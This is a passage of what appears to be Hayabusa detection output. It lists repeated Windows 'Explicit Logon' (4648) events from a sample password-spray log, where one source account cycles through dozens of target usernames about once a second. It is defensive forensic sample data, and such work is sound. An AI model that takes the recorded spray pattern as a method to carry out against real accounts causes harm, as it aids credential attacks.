Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:18.019 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:19.076 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:20.162 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:21.257 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:22.327 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:23.410 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:24.477 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:25.557 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:26.628 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:27.690 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:28.763 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:29.837 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:30.921 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:31.996 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:33.058 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:34.138 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:35.199 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:36.266 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:37.375 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:38.439 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:39.499 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:40.560 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:41.637 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:42.734 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:43.795 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:44.875 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:45.951 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:47.017 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:48.096 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:49.176 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:50.264 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:51.340 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:52.405 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:53.466 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:54.572 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:55.671 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:56.741 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:57.817 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:58.894 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:59.965 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:01.026 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:02.115 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:03.191 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:04.272 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:05.348 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:06.426 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:07.478 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:08.564 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:09.668 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:10.717 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:11.809 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:12.857 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:13.904 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:14.972 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:16.050 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:17.129 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:18.186 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:19.254 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:20.329 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:21.401 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:22.487 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:23.577 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:24.660 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:25.732 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:26.794 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:27.863 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:28.925 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:29.993 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:31.050 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:32.142 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:33.206 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:34.265 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:35.340 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:36.403 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:37.453 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:38.533 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:39.613 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:40.691 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:41.769 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit 